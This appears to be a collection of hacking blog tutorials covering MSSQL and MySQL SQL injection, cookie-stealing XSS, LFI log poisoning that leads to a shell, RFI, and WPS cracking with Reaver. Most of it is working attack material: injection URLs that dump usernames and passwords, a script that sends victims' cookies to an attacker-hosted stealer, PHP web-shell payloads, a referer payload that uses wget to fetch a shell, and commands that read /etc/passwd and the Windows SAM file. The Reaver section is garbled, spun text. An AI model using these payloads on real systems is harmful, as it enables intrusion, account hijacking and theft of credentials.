Mssql Blind Sql Injection Tutorial Step By Step !

Mssql Blind Sql Injection Tutorial Step By Step

In this tutorial you will learn how to perform and exploit Blind Mssql SQL Injection manually step by step.So,

What is Blind Mssql SQL Injection ?

Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.

In some case, Using normal sql injection is not work. Blind sql injection is another method which may help you. The important point for blind sql injection is the difference between the valid and invalid query result.You have to inject a statement to make query valid or invalid and observe the response.

How To Test Mssql Blind SQL Injection Vulnerable Sites ?

Lets us assume that  http://www.example.com/page.asp?id=1 is normal url of the website. so lets check the vulnerability of website by using true & false conditions like 1=2, 1=1, or 0>1.

http://www.example.com/page.asp?id=1 and 1=1  (True)
http://www.example.com/page.asp?id=1 and 1=2  (False)
http://www.example.com/page.asp?id=1 and 0>1  (False)

If the results from these requests are different, it will be a good signal for you. That Means the Website is vulnerable to blind mssql Sql injection. When you put “id=1 and 1=1“, It means that the condition is true so, the response must be normal. But the parameter “id=1 and 1=2″ indicates that the condition is false and if the webmaster does not provide a proper filter, the response absolutely differs from previous.

Extracting data through Blind Mssql SQL Injection

By using blind mssql sql injection you can extract database but you have to spend more time on that. You will get only one character of the word by executing the some queries.

Let me explain you an example of querying the first character of database name. We assume that database name is member. Therefore, the first character is “m” which the ascii value is 109. (At this point, we assume that you know ascii code).

Ok, first, we have to know that the results from requests have only 2 forms.

The following steps are up to each person. You idea may be different from our idea in order to pick ascii code to test query.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

In this situation, the result will be valid query result like http://www.example.com/page.asp?id=1 and 1=1 (because the first character of database name is “m” which ascii code is 109). Then, we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120

It is surely that the result will like http://www.example.com/page.asp?id=1 and 1=2 (because 109 absolutely less than 120).
then, we will try,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105

The result is a valid query result and at this point, the ascii value of first character of database name is between 105 and 120.
So, we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112 ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108 ===> valid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110 ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109 ===> invalid query result

You see that the first character of database name has an ascii value which is greater than 108
but is not greater than 109. Thus, we can conclude that the ascii value is equal to 109.

You can prove with:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109

We sure that the result is like the result of http://www.target.com/page.php?id=1 and 1=1

The rest which you have to do is to manipulate some queries to collect your preferred information.
In this tutorial, we propose some example queries in order to find the names of tables and columns in the database.

Extracting table names through Blind Mssql SQL Injection

In order to get table name, we can use above method to obtain each character of table name.The only thing that we have to do is to change query to retrieve table name of current database. As MSSQL does not have limit command. Therefore, the query is a bit complicated.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) 
 FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
 AS varchar(8000)),1,1)),0)>97

The above query is used to determine the first character of first table in current database. If we want to find second character of first table,we can do by following request:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),2,1)),0)>97

We change the second parameter of substring function from 1 to 2 in order to specify preferred position of character in table name.
Thus, if we want to determine other positions, we require only changing second parameter of substring function.

In case of other tables, we can find other table names by changing the second select
from “SELECT TOP 1” to be “SELECT TOP 2” , “SELECT TOP 3” and so on. for example,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)=97

Extracting column names through Blind Mssql SQL Injection

After we obtain table names, the next target information is absolutely column names.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i HERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97

In order to circumvent from magic quote filtering, you have to change ‘tablename’ to be the form of concatenating char() command. for example, if table name is ‘user’, when we put ‘user’ in the query, ‘ may be filtered and our query will be wrong. The solution is convert ‘user’ to be char(117)+char(115)+char(101)+char(114). So, the query in where cluase changes from “Where name=’user'” to “Where name=char(117)+char(115)+char(101)+char(114)”.

Read more: Union Based Mssql Injection Manually Step by Step
In this case, we can circumvent magic quote filtering. The result from the above request is the first character of the first column name of specific table.
When we want to find the second character of the first column, we can use the same method as getting table name, by changing the second parameter of
substring function.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97

The above request is used to determine the second character of the first column name in specific table.
In case of determining other columns, we can do by changing p.x value from 1 to 2,3,4 and so on. such as,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97

The first character of the second column name in specific table can be determined by the above request.

 

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Cookie Stealing From Cross Site Scripting (xss ) Attack

Hello Guys, In this post I will show you Cookie Stealing From Cross Site Scripting ( xss ) Attack. How Attacker can steal cookie from users ?. So I hope you are familiar with xss If not then please read our basic xss tutorial.

Pre-requisite :

  • A Cookie Stealer Code : Get It From Here
  • A Free Web Hosting.
  • Basic Knowledge About XSS Attack.

Cookie stealing is the process in which and attacker exploit the xss vulnerability and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

Creating PHP Cookie Stealer

 

  • Copy the cookie stealer code from here.
  • Open the notepad or any editor and paste the code.
  • Save the file with .php extension. Ex:- xss.php

Now create New file and save it as log.txt (leave it as blank). Don’t change the name , this is the file name what we give in php file.
Now we have Two Files : 1) xss.php 
                                      2) log.txt

Hosting Cookie Stealer and Log file

Now we have to host both the files for hosting files you can use free web hosting or you can do secure tunelling. After hosting domain the stealer will be at : www.domain.com/xss.php

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Now, we have set everything now we have to find vulnerable website to exploit to inject our malicious code.

<script>location.href = ‘http://www.site.com/xss.php?cookie=’+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don’t need to send any link to others.  Whoever visit the page, they will be vicim.

Reflected: In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Reflected XSS .

In Reflected, Attackers will send the injected link victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;</script>

The above link is clearly shows the script. Attacker can encode this script in url encoding and and make short the link with url shortening service like tiny url and then send to victim.

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim Open the link, his/her cookie will be stored in log.txt file.

 

MSSQL Union Based Injection Step By Step

MSSQL Union Based Injection Step By Step

Today I am going to show you MSSQL Union Based Injection Step By Step. In this post I will only cover from basics. I don’t see a lot of detailed tutorials on the Internet so I am going to do what I can to help out based on my experience with MS SQL Injections. first of all we need to know the basics of injecting, all the basics including finding the type of injection, database testing and finding the columns etc are same to other databases so i ll suggest you to read the basics before you start here if you don’t read them yet.

so, lets start 😀 ………..

  • So the checking part is same as MySQL first putting single quote and then putting double quote checking the error and i came to know this one is single quote based injection.
www.site.com/?id=1%27 [ Error ]
www.site.com/?id=1%22 [ Error ]

RememberWhen both Single quote and double Quotes gives error then there are high probablities that the injection type is integer based because Single quote based then double quote do not give error and when the injection is double quote based then single quote do not give error, and when both single quote and double quotes give error then apply the golden rule that the injection is integer type.

  • Now lets break and fix the query
    www.site.com/?id=1 -- - [ Working Fine ]
    www.site.com/?id=1 order by 5-- - [ Working Fine ]
    www.site.com/?id=1 order by 6-- - [ Error ]

    That means total number of columns are 5.

  • Now we can continue with order by and in the end we come to know that 5 is the last working column. Now the next part is using using the union select query.
www.site.com/?id=1 and false UnIoN SeLeCt 1,2,3,4,5-- -
MSSQL Union Based Injection Step By Step

If you get this error then in such cases we have an option to use null.

www.site.com/?id=1 and false UnIoN SeLeCt null,null,null,null,null-- -
  • so now we have to use have to convert each column one by one to @@version or db_name() that you will see in video how I did ;).
  • Now when we will put @@version in the column and if the column is vulnerable then it shows version something like this..
    MSSQL Union Based Injection Step By Step

There are some other ways also to collect some more information from MSSQL which are given here:

  1. @@version – Gives version
  2. db_name() – Gives the name of database()
  3. user,system_user,current_user,user_name – Gives the current user.
  4. @@SERVERNAME – Gives the info. about Hostname.
  • Now we will extract the table names, here the syntax is a little bit different than MySQL of lack of limit clause in MSSQL.
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--
  • In this way Increase the top value. But in video I have shown only diosing site.
  • Now in same manner we can extract the column name. let’s see..
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 1 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 2 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
  • Now lets dump the data from tables and columns. here for concatenation we can use %2b which is ‘ + ‘ .
http://site.com/?id=1 and false Union All Select 1,username%2b' '%2bpassword,3,db_name(),5 from from table name here --

Now we have done this almost. Now lets come to diosing part.

This dios have been created by my friends Zen and Rummy. By Diosing the site we can make the whole process faster.

How to Dios the Mssql Site:

Dios

;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--

  • Just remove the union select and fix the query then add dios and execute as shown below for more details see video.
http://site.com/?id=1;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--
  • It will give error but actually its making the DIOS table so now lets try checking the output under Ahmed1.

MSSQL Union Based Injection Step By Step

  • And here we got compete output at once. Before i finish i ll like to show you some basic errors in MSSQLi.

So here we finish MSSQL Union Based Injection. Keep practicing and learning guys..

Spawning a Shell by LFI Poisoning Log Files

Spawning a Shell by LFI Poisoning Log Files

Welcome Padawan!
A while ago, a friend sent me a link to a challenge, I found one of the pages vulnerable to SQL Injection, I injected it, extracted the Admin’s Credentials and as soon as I logged in the “Admin Panel”, I found a page vulnerable to LFI.
So .. I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that but they weren’t working/there. 🙁 ..

The only thing I didn’t try was LFI Log File Poisoning but It was time to unchain the beast ..
I included the “Apache HTTP Configuration file” and looked for the error/access log. Interestingly, instead of finding a .log file, I found a piped bash script ..

Spawning a Shell by LFI Poisoning Log Files

Me likey 🙂 .. Then, of course, I included the bash script. — This was it’s contents ..

#!/bin/bash

DATE=`date +%Y-%m-%d`

while : ; do
 read line
 [ -z "$line" ] && exit

 DOMAIN=""
 if [[ "$line" =~ \[host:([^\]]+) ]]; then
 DOMAIN=${BASH_REMATCH[1]}
 fi
 
 if [ -n "$DOMAIN" ]; then
 echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
 chown apache:apache /var/www/html/$DOMAIN/logs/error_${DATE}.log
 else
 echo "${line}" >> /var/www/html/error_${DATE}.log
 chown apache:apache /var/www/html/error_${DATE}.log
 fi
done

What does this do? It creates a .log file in “/var/www/html/domain.tld/logs/” with the name “error_YYYY-MM-DD” & According to the Apache Config, It sent URL, Referer and time to this bash script which then saved it to the file .. So, I just had to visit a non-existent page *to get a 404* with my referer set to “<?php system(‘wget http://x.com/y.txt -O z.php’); ?>” or any of it’s equivalents .. and then include the .log file to execute the code 😉

curl -e “<?php system($_POST[‘x’]) ?>” http://domain.tld/blablabla.ext

Spawning a Shell by LFI Poisoning Log Files

curl –data “x=cat /etc/passwd” http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log

Spawning a Shell by LFI Poisoning Log Files

I guess we’re done here 😀

ps: after solving the challenge I found out the “official solution” was nothing like this, it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to sucessfully bypass that function + other image re-sizing functions .. there are various great articles written on that topic here are some of them ..

Hack WiFI Password Using Reaver Without Wordlist

Hack WiFI Password Using Reaver Without Wordlist

In this post you will learn how to hack WiFI Password Using Reaver Without Wordlist

Reaver is a system within Kali Linux that allows an aggressor (possibly that frightening next-door neighbor of yours that never ever leaves their loft without taking unusual to another level), easily haggle your switches watchword by attacking the PIN approval procedure in between your switch and various devices. Really, in light of the reality that Reaver does not use a word recommendation file to bruteforce your watchword, it does not make a distinction how strong or long it is and Reaver WILL unavoidably break the PIN!

Reaver arbitrarily runs each imaginable mix of 4 numbers up until it breaks the PIN! At that point voila!

To use Reaver, you need to get your WiFi card’s user interface name, the BSSID of the switch you’re venturing to break and you need to confirm your remote WiFi remains in WPS mode. We need to do all that!

Discover your remote WiFi:

Inside Terminal, type: iwconfig

Press Enter. You should see a remote gizmo in the taking place rundown. In all likelihood, it’ll be called:

wlan0 or wlan1

At the very same time on the off possibility that you have more than one WiFi card, or a more unexpected systems administration setup, it may be called something else.

Put your remote card into smelling mode: Assuming your remote card’s user interface name is: wlan0

Carry out the accompanying order to put your remote card into screen mode:

airmon-ng start wlan0

This charge will yield the name of smelling mode user interface, which you’ll also have to make note of. In all possibility, it’ll be: mon0

Discover the BSSID of the AP you have to hack:

In conclusion, you need to get the extraordinary identifier of the switch you’re striving to divide so you can point Reaver in the best course. To do this, carry out the accompanying command:

airodump-ng mon0

When you see the system you require, push CTRL+C to avoid the rundown from stimulating, then duplicate that organize’s BSSID (its the plan of letters, numbers, and colons on the far left). The system should have WPA or WPA2 taped under the ENC area.

Currently, with the BSSID and smelling user interface name under control, you’ve got all that you need to fire up Reaver.

Crack a Network’s WPA Password with Reaver

To see whether the AP you are attacking usages WPS (helpless versus Reaver), you can confirm with:

wash -i mon0

Look under the LOCK area. On the off possibility that your target BSSID has its WPS LOCKED (you will see “yes” for LOCKED Wpss), then Reaver will not have the capability to break the PIN. On the off opportunity that you see a “no”, then continue …

Presently execute currently carry out charge in the Terminal.

If your screen user interface was mon0 like mine, and your BSSID was.

8a: ab:9 e:82:9 a: c2

your command would resemble:.

reaver -i mon0 -b 8d: ae:9 d:65:1 f: b2 -vv

Reaver will now try a development of Pins on the switch in a monster energy attack, one after an alternate. In my efficient test, Reaver took around 6 hours to divide the PIN and communicate me the best secret element.

Perfect Adapter to use this hacking:

Alfa AWUS036H 1000mW 1W 802.11 b/g USB Wireless WiFi network Adapter with 5dBi Antenna and Suction cup Window Mount dock – for Wardriving & Range Extension

Reaver is a system within Kali Linux that allows an attacker (maybe that frightening next-door neighbor of yours that never ever leaves their loft without taking unusual to another level), easily haggle your switches watchword by attacking the PIN approval procedure in between your switch and various devices. In fact, in light of the reality that Reaver does not use a word referral file to bruteforce your watchword, it does not make a distinction how strong or long it is and Reaver WILL undoubtedly break the PIN!

Reaver arbitrarily runs each imaginable mix of 4 numbers up until it breaks the PIN! On the off possibility that your target BSSID has its WPS LOCKED (you will see “yes” for LOCKED Wpss), then Reaver will not have the capability to break the PIN. Reaver will now try a development of Pins on the switch in a monster energy attack, one after an alternate.

Local File Inclusion LFI On Windows Server

Local File Inclusion LFI on windows server

In previous post I showed you Local File Inclusion LFI on Linux server but today in this post i will show you how Local File Inclusion LFI on windows server. In this post I will not start with introduction for complete guide please refer my old post.

What is Local File Inclusion LFI vulnerability ?

The local file inclusion LFI is a process of Including Local File available on web server. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitized then an attacker give the some default files location and access all these sensitives files.

Here it is the vulnerable code.

<?php
 if (IsSet($_GET['page']))
 include($_GET['page']);
?>

Here we can see that the script doesn’t check for which file to be included and hence, we are free to include any file by changing the ‘page’ GET variable value.

Finding Local file Inclusion LFI vulnerability in website

Now we are going to find an local file inclusion on website so we found a website lets check it if its vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now lets replace contact.php with ../ so the URL will become

www.vulnerablewebsite.com/view.php?page=../

Now after requesting this page we got an error here big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2
Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

In Linux we we include /etc/passwd but in windows server we include /windows/repair/sam so this repair/sam is backup sam file

http://localhost/test.php?page=../../windows/repair/sam

So you know if not found then you will have to move directory up by using ../

So, as you all know in Local file inclusion LFI An attacker can include the sensitives file. so now let us shell the webserver.

For this we will send the some error to the logs of webserver by using a php code.

<?php passthru($_GET['cmd']); ?>

You can also exploit using the system(),exec(),shell_exec() e.t.c commands. The commands are offered by php to execute system level commands.

Here i am going to use telnet to inject malicious code as error in log files.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1

so this script is saved in web server and now we will have to include it.

http://localhost/test.php?page=../logs/access.log&cmd=dir

so now we you can do any thing here after including log files. and you can execute the system level command. like,

http://localhost/test.php?page=../logs/access.log&cmd=dir
http://localhost/test.php?page=../logs/access.log&cmd=mkdir
http://localhost/test.php?page=../logs/access.log&cmd=wget

so now you can wget the shell and download in web.

Hope you enjoyed this session and learned. so thanks for reading guys. keep learning 😉

Error Based Sql Injection With Exponential Method

Error Based Sql Injection With Exponential Method

Hello guys in previous post I covered basic normal error based sql injection but in this post I will cover error based sql injection with exponential method and mathematical operations.When we take the functions in MySQL I was interested in the mathematical functions. They too should contain some data type to hold values. So I went on testing for functions which would cause any overflow errors and I found out that exp() would cause a overflow error when we pass a large value above 709.

POC 1:

mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The exp is the opposite of the log functions of MySQL.If I briefly explain the functionality of these, log and ln and both returns the answer to the natural logarithm or to the base e. In common e is approximated to:error based sql injection exponential method

POC 2:

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)


mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+

| 2.70805020110221 |

1 row in set (0.00 sec)

Exponentials are the opposite of logarithms. The exp function would do the exact opposite for us.

Injection :

  • Extracting database name
    http://127.0.0.1/?id=1' or exp(~(select*from(select user())x))-- -
  • Extracting Table name and column name in one shot.
http://127.0.0.1/?id=1' or exp(~(select * from(select group_concat('<li>',table_name,'::::'column_name) from information_schema.columns where table_schema=database())x))-- -

Yeah we done and injected using exponential method.

Thanks for reading guys keep learning 😉

 

Error Based sql Injection Step by Step

Error Based Sql Injection Step by Step

After the union based sql injection I am going to cover error based sql injection. Sometimes during injection sites we got number of columns but on union statement it gives an error The used select statement has different number of columns. and then you start brute forcing columns but brute forcing also not works. So these kinds of websites are injected by Error based or double query injection.

so lets come to work…

  1. First step is to get version here is the error based query to get version.
www.vuln-web.com/?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 -- -

2. Second step is to enumerate the database of website use the above query and replace version() with database(). but there is a another syntax used to enumerate database is:

www.vuln-web.com/?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

If the website has more than one database the it can be enumerate by changing limits such as
Limit 0,1
Limit 1,1
Limit 2,1

In this way you can get all the database of the website.

3. Third step is to enumerate the table names and the column name of the target

www.vuln-web.com/?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -

using this query you can get a table name. For getting all the table name what you can do is just increase the value of limits as shown above.

4. Fourth step is to enumerate the columns so we got the column users and we have to enumerate the columns of the table user

www.vuln-web.com/?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

Note : Replace the table_name=0x7573657273 with your desired table name and convert it into hex.

5. Fifth step is to dump data from the column so suppose we get the column name is username and password. so we are going to dump the password column from the table users.

www.vuln-web.com/?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,0x3a,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

here we use 0x3a is a hex vale of ‘ : ‘  it s a break between in username and password and it shows result like this
username : password
If we doesn’t use this break we will not understand what’s on the page it give result like this
usernamepassword

Here,
users = table name
Username = Column 1st
password  = Column 2nd

Replace this with your desired table name and column name.

Thanks for the reading guys keep practising and learning 🙂

Remote File Inclusion RFI Attack

Remote File Inclusion RFI Attack

In this session you will learn how you can exploit remote file inclusion RFI vulnerability. so, lets start with basic concepts and introduction.

What Is Remote File Iinclusion ?

RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript) *client sided shiZ*.

RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface *if that’s what you’re looking for 😐 * the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux.

Read More : Local File Inclusion Attack

Starting with RFI

Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks. If you can’t find one, don’t worry you’ll still learn 😀 – Just upload this on any site and save it as index.php in a folder called rfi.

<?php
# Infoseczone's RFI Tutorial @ infoseczone
$file = $_GET['file'];
if ($file != null){include($file.".html");}
?>

and save this as a tut.html

<html>
<body>
<center><h1>RFI</h1></center>
</body>
</html>

then visit http://yoursite.com/rfi/index.php?file=tut

As you can see, this code (index.php) pulls documents from the file parameter, adds .html in the end and “includes” it.
If this isn’t coded properly, the script doesn’t check where the file is coming from and so an inclusion from another site will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another site but still run on the site being targeted. Let’s Try It Out.

http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt
Warning: include(http://evilsite.com/evilscript.txt.html): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/yoursite/public_html/rfi/index.php on line 4

Just like we have the %00 to get rid of the .html part in LFI you got the “?” sign in RFI. If you go to index.php?file=http://evilsite.com/evilscript.txt? it will include evilscript.txt and not evilscript.txt.php because the ? sign makes .php an GET argument! Which does not affect which file you are requesting on remote servers.

http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt?

Patching Remote File Inclusion Vulnerability

Method One (Switch Statement)

<?php
$file = $_GET['file'];
switch($page){
        case "about":
        include("aboutus.html");
        break;
        case "contact":
        include("contactus.html");
        break;
        default: # If parameter != contact or about
        include("tut.html");
        break;}
?>

Method Two (If Statement)

<?php
$file = $_GET['file'];
if (isset($file))
{
 Â  Â  if ($file == "about")
 Â  Â  {
 Â  Â  Â  Â  Â include("aboutus.html");
 Â  Â  }
 Â  Â  elseif ($file == "contact")
 Â  Â  {
 Â  Â  Â  Â  Â include("contactus.html");

Thanks For Reading Keep learning some good stuffs 😀

Bypass illegal mix of collations in sql injection

Bypass illegal mix of collations in sql injection

In this post you will learn how you can bypass the error illegal mix of collations in sql injection.

what is illegal mix of collation ?

Collation refers to a set of rules that determine how data is sorted and compared. Character data is sorted using rules that define the correct character sequence, with options for specifying case-sensitivity, accent marks, character types and character width.

Collation is concerned with how character data is interpreted by SQL Server. Because many people use MySQL with data to be stored in languages other than English, they need to select the rules of comparisons which in turn depends on the character set used for storing that data.

In MySQL, data is stored using a specific character set, which can be defind at different levels; i.e., the sever, the database, the table, and the column levels.

With union select we are combining result-set of two or more select statements. We already know that each SELECT statement within the UNION must have the same number of columns. The columns must also have similar data types. And they must have same collation !! If they are different we get an error.

Bypassing Error

# Method 1

Define COLLATE
SELECT * FROM table ORDER BY somekey COLLATE latin1_general_ci;

We can use different collation names:
latin1_general_ci
utf8_general_ci
utf8_unicode_ci
latin1_german1_ci
latin1_swedish_ci

A name ending in _ci indicates a case-insensitive collation.
A name ending in _cs indicates a case-sensitive collation.
